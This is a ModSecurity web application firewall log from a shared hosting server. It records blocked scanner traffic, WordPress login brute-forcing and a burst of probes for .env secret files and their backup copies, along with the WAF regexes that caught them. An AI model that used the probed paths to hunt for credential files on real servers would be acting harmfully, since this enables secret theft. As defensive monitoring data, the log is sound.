[Tue May 26 18:03:04.684868 2026] [security2:error] [pid 960743:tid 960919] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTAPQvEln_BHBy2zJoZAAAALM"]
[Tue May 26 18:03:05.371158 2026] [security2:error] [pid 960743:tid 960973] [client 185.192.70.98:20347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/about.php"] [unique_id "ahWTAfQvEln_BHBy2zJoggAAAOk"]
[Tue May 26 18:03:06.179045 2026] [security2:error] [pid 960743:tid 960991] [client 82.76.238.33:58975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTAvQvEln_BHBy2zJomwAAAPs"]
[Tue May 26 18:03:06.179171 2026] [security2:error] [pid 960743:tid 960991] [client 82.76.238.33:58975] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTAvQvEln_BHBy2zJomwAAAPs"]
[Tue May 26 18:03:06.408413 2026] [security2:error] [pid 960743:tid 960892] [client 185.192.70.80:58553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/admin.php"] [unique_id "ahWTAvQvEln_BHBy2zJonwAAAJg"]
[Tue May 26 18:03:06.445874 2026] [security2:error] [pid 960743:tid 960988] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTAvQvEln_BHBy2zJokwAAAPg"]
[Tue May 26 18:03:08.944217 2026] [security2:error] [pid 960743:tid 960897] [client 185.192.70.100:37017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/mah.php"] [unique_id "ahWTBPQvEln_BHBy2zJo4wAAAJ0"]
[Tue May 26 18:03:09.212668 2026] [security2:error] [pid 960743:tid 960882] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTBPQvEln_BHBy2zJo4QAAAI4"]
[Tue May 26 18:03:09.659194 2026] [security2:error] [pid 960743:tid 960766] [remote 92.117.185.70:61949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTBfQvEln_BHBy2zJo7QAA0BY"]
[Tue May 26 18:03:10.653058 2026] [security2:error] [pid 960743:tid 960788] [remote 217.112.89.35:36546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTBvQvEln_BHBy2zJpBQAA3yw"]
[Tue May 26 18:03:10.979445 2026] [security2:error] [pid 960743:tid 960792] [remote 209.42.20.53:32816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWTBvQvEln_BHBy2zJpDQAAuDA"]
[Tue May 26 18:03:11.152191 2026] [security2:error] [pid 960743:tid 960967] [client 185.192.70.89:62809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 89.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.wp/wso.php"] [unique_id "ahWTB_QvEln_BHBy2zJpFAAAAOM"]
[Tue May 26 18:03:12.038267 2026] [security2:error] [pid 960743:tid 960991] [client 185.192.70.70:62959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/core.php"] [unique_id "ahWTB_QvEln_BHBy2zJpPgAAAPs"]
[Tue May 26 18:03:12.507203 2026] [security2:error] [pid 960743:tid 960815] [remote 74.7.241.58:49980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWTCPQvEln_BHBy2zJpTAAAw0c"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:03:12.523402 2026] [security2:error] [pid 960743:tid 960932] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTCPQvEln_BHBy2zJpRQAAAMA"]
[Tue May 26 18:03:12.886050 2026] [security2:error] [pid 960743:tid 960951] [client 185.192.70.99:59865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/robots.php"] [unique_id "ahWTCPQvEln_BHBy2zJpUwAAANM"]
[Tue May 26 18:03:13.793070 2026] [security2:error] [pid 960743:tid 960977] [client 185.192.70.71:27147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/inputs.php"] [unique_id "ahWTCfQvEln_BHBy2zJpYwAAAO0"]
[Tue May 26 18:03:14.673782 2026] [security2:error] [pid 960743:tid 960847] [remote 195.250.23.247:40456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWTCvQvEln_BHBy2zJpdQAAhmc"]
[Tue May 26 18:03:14.951348 2026] [security2:error] [pid 960743:tid 960873] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTCvQvEln_BHBy2zJpdgAAAIU"]
[Tue May 26 18:03:15.020981 2026] [security2:error] [pid 960743:tid 960849] [remote 195.250.23.247:40456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWTCvQvEln_BHBy2zJpfgAA9Wk"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:03:15.137516 2026] [security2:error] [pid 960743:tid 960881] [client 185.192.70.83:50909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/mini.php"] [unique_id "ahWTC_QvEln_BHBy2zJpfwAAAI0"]
[Tue May 26 18:03:15.787773 2026] [security2:error] [pid 960743:tid 960886] [client 185.192.70.79:33797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/goods.php"] [unique_id "ahWTC_QvEln_BHBy2zJpigAAAJI"]
[Tue May 26 18:03:16.650101 2026] [security2:error] [pid 960743:tid 960917] [client 82.76.238.33:59398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTDPQvEln_BHBy2zJpngAAALE"]
[Tue May 26 18:03:16.650223 2026] [security2:error] [pid 960743:tid 960917] [client 82.76.238.33:59398] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTDPQvEln_BHBy2zJpngAAALE"]
[Tue May 26 18:03:16.972713 2026] [security2:error] [pid 960743:tid 960979] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTDPQvEln_BHBy2zJpmgAAAO8"]
[Tue May 26 18:03:17.054223 2026] [security2:error] [pid 960743:tid 960903] [client 95.111.225.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTDPQvEln_BHBy2zJpnQAAAKM"]
[Tue May 26 18:03:17.688967 2026] [security2:error] [pid 960743:tid 960939] [client 208.84.100.173:24130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env"] [unique_id "ahWTDfQvEln_BHBy2zJprQAAAMc"]
[Tue May 26 18:03:17.694653 2026] [security2:error] [pid 960743:tid 960902] [client 208.84.100.173:24176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/app/.env"] [unique_id "ahWTDfQvEln_BHBy2zJprgAAAKI"]
[Tue May 26 18:03:17.702263 2026] [security2:error] [pid 960743:tid 960973] [client 208.84.100.173:24156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/backend/.env"] [unique_id "ahWTDfQvEln_BHBy2zJpsgAAAOk"]
[Tue May 26 18:03:17.702450 2026] [security2:error] [pid 960743:tid 960959] [client 208.84.100.173:24172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/api/.env"] [unique_id "ahWTDfQvEln_BHBy2zJpsAAAANs"]
[Tue May 26 18:03:17.958469 2026] [security2:error] [pid 960743:tid 960892] [client 185.192.70.96:22709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/file5.php"] [unique_id "ahWTDfQvEln_BHBy2zJpvAAAAJg"]
[Tue May 26 18:03:19.059027 2026] [security2:error] [pid 960743:tid 960945] [client 185.192.70.74:60639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/ahax.php"] [unique_id "ahWTDvQvEln_BHBy2zJp0AAAAM0"]
[Tue May 26 18:03:19.422202 2026] [security2:error] [pid 960743:tid 960966] [client 208.84.100.173:24172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahWTD_QvEln_BHBy2zJp1wAAAOI"]
[Tue May 26 18:03:19.905193 2026] [security2:error] [pid 960743:tid 960865] [remote 178.104.167.38:56348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.167.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWTD_QvEln_BHBy2zJp5AAA7Xk"]
[Tue May 26 18:03:20.064650 2026] [security2:error] [pid 960743:tid 960998] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTD_QvEln_BHBy2zJp4wAAAQI"]
[Tue May 26 18:03:20.175972 2026] [security2:error] [pid 960743:tid 960867] [remote 178.104.167.38:56348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.167.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWTEPQvEln_BHBy2zJp8QAA3Hs"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:03:20.902190 2026] [security2:error] [pid 960743:tid 960930] [client 208.84.100.173:24248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahWTEPQvEln_BHBy2zJqCAAAAL4"]
[Tue May 26 18:03:21.021634 2026] [security2:error] [pid 960743:tid 960984] [client 208.84.100.173:24226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahWTEfQvEln_BHBy2zJqCgAAAPQ"]
[Tue May 26 18:03:21.090410 2026] [security2:error] [pid 960743:tid 960971] [client 208.84.100.173:24156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahWTEfQvEln_BHBy2zJqEwAAAOc"]
[Tue May 26 18:03:21.090439 2026] [security2:error] [pid 960743:tid 960945] [client 208.84.100.173:24478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahWTEfQvEln_BHBy2zJqEgAAAM0"]
[Tue May 26 18:03:21.090523 2026] [security2:error] [pid 960743:tid 960969] [client 208.84.100.173:24494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahWTEfQvEln_BHBy2zJqEQAAAOU"]
[Tue May 26 18:03:21.094077 2026] [security2:error] [pid 960743:tid 960869] [remote 134.209.100.212:50998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 212.100.209.134.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTEPQvEln_BHBy2zJqBQAA7n0"]
[Tue May 26 18:03:21.189859 2026] [security2:error] [pid 960743:tid 960963] [client 208.84.100.173:24172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahWTEfQvEln_BHBy2zJqGQAAAN8"]
[Tue May 26 18:03:21.191127 2026] [security2:error] [pid 960743:tid 960920] [client 208.84.100.173:24464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahWTEfQvEln_BHBy2zJqGgAAALQ"]
[Tue May 26 18:03:21.289070 2026] [security2:error] [pid 960743:tid 960992] [client 208.84.100.173:24506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahWTEfQvEln_BHBy2zJqHAAAAPw"]
[Tue May 26 18:03:21.289073 2026] [security2:error] [pid 960743:tid 961000] [client 208.84.100.173:24226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahWTEfQvEln_BHBy2zJqHQAAAQQ"]
[Tue May 26 18:03:21.310287 2026] [security2:error] [pid 960743:tid 960983] [client 208.84.100.173:24248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahWTEfQvEln_BHBy2zJqHgAAAPM"]
[Tue May 26 18:03:21.320989 2026] [security2:error] [pid 960743:tid 960987] [client 208.84.100.173:24156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahWTEfQvEln_BHBy2zJqHwAAAPc"]
[Tue May 26 18:03:21.320995 2026] [security2:error] [pid 960743:tid 960924] [client 208.84.100.173:24494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahWTEfQvEln_BHBy2zJqIAAAALg"]
[Tue May 26 18:03:21.322194 2026] [security2:error] [pid 960743:tid 960894] [client 208.84.100.173:24478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahWTEfQvEln_BHBy2zJqIQAAAJo"]
[Tue May 26 18:03:21.423611 2026] [security2:error] [pid 960743:tid 960936] [client 208.84.100.173:24464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahWTEfQvEln_BHBy2zJqJQAAAMQ"]
[Tue May 26 18:03:21.425333 2026] [security2:error] [pid 960743:tid 960962] [client 208.84.100.173:24172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahWTEfQvEln_BHBy2zJqJgAAAN4"]
[Tue May 26 18:03:21.586958 2026] [security2:error] [pid 960743:tid 960959] [client 208.84.100.173:24494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahWTEfQvEln_BHBy2zJqKgAAANs"]
[Tue May 26 18:03:21.622136 2026] [security2:error] [pid 960743:tid 960893] [client 185.192.70.84:65135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/f35.php"] [unique_id "ahWTEfQvEln_BHBy2zJqJwAAAJk"]
